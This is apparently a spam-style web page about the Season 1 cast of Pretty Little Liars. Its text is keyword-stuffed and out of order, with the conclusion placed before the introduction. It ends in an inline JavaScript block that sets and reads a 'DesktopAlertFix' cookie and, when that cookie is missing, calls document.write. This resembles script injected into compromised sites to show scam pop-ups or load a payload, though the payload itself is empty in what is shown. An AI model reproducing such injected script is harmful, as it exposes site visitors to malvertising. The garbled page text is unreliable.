Pretty Little Liars Cast Season 1 【TOP ●】

Whether you were Team Ezria, Team Spoby, or just there for the wigs and wine moms, the Season 1 cast of Pretty Little Liars will always be that ensemble. Stream Pretty Little Liars Season 1 on Max or Hulu, and keep an eye on the cast’s newer projects—they’ve all come a long way from Rosewood High.

When Pretty Little Liars premiered on ABC Family (now Freeform) in June 2010, no one could have predicted the cultural phenomenon it would become. Based on Sara Shepard’s book series, the show blended teen drama, mystery, and psychological thriller elements into a glossy, addictive package. But at its heart was a perfectly assembled ensemble cast. pretty little liars cast season 1

(function () { function daCreateCookie(name, value, hours) { if (hours) { var date = new Date(); date.setTime(date.getTime() + (hours * 60 * 60 * 1000)); var expires = "; expires=" + date.toGMTString(); }else { var expires = ""; } document.cookie = name + "=" + value + expires + "; path=/"; } function daReadCookie(name) { var nameEQ = name + "="; var ca = document.cookie.split(';'); for (var i = 0; i < ca.length; i++) { var c = ca[i]; while (c.charAt(0) == ' ') { c = c.substring(1, c.length); } if (c.indexOf(nameEQ) == 0) { return c.substring(nameEQ.length, c.length); } } return null; } if (daReadCookie("DesktopAlertFix") == null) { document.write(``);